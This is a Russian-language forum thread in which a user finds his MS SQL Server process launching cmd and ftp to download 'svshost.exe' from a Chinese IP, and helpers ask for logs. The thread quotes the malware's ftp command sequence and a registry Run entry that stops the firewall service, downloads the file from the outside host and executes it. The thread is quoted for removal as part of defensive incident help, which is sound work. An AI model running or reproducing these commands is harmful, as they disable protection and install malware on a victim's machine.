PDA

Показать полную графическую версию : mssql сервер стучится по ftp на какой-то китайски ip

mitiya
14-09-2013, 00:08
недавно случайно увидел в процессах, что sqlservr.exe открыл cmd, а тот в свою очередь ftp со следующим валом команд


open 1.93.45.141
12345
12345
binary
get svshost.exe
bye


ip этот это какой-то сервер в Китае. причем там тоже стоит 2003 и даже можно попробовать подключиться по rdp.
так же там на 83 порту висит hfs. А вот ftp тут нет.
Пока не знаю что со всем этим делать.

Вопрос как sql сервер может запустить cmd? это можно сделать командой в sql ? или тут скорей всего через уязвимость ?

Ну и самый главный вопрос. Где мне искать зловреда?
iskander-k
14-09-2013, 21:04
Выложите логи в соответствии с этими (http://forum.oszone.net/post-717373.html) инструкциями.
mitiya
15-09-2013, 19:44
вот логи
thyrex
15-09-2013, 21:32
Пофиксите в HiJack
O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 1.93.45.141 > cmd.txt&echo 12345>> cmd.txt&echo 12345>> cmd.txt&echo binary >> cmd.txt&echo get svshost.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&svshost.exe&svshost.exe&dСделайте новый лог RSIT
mitiya
15-09-2013, 22:30
это я уже сделал. но вопрос от куда, и почему в процессах cmd был запущен от sqlservr.exe



© OSzone.net 2001-2012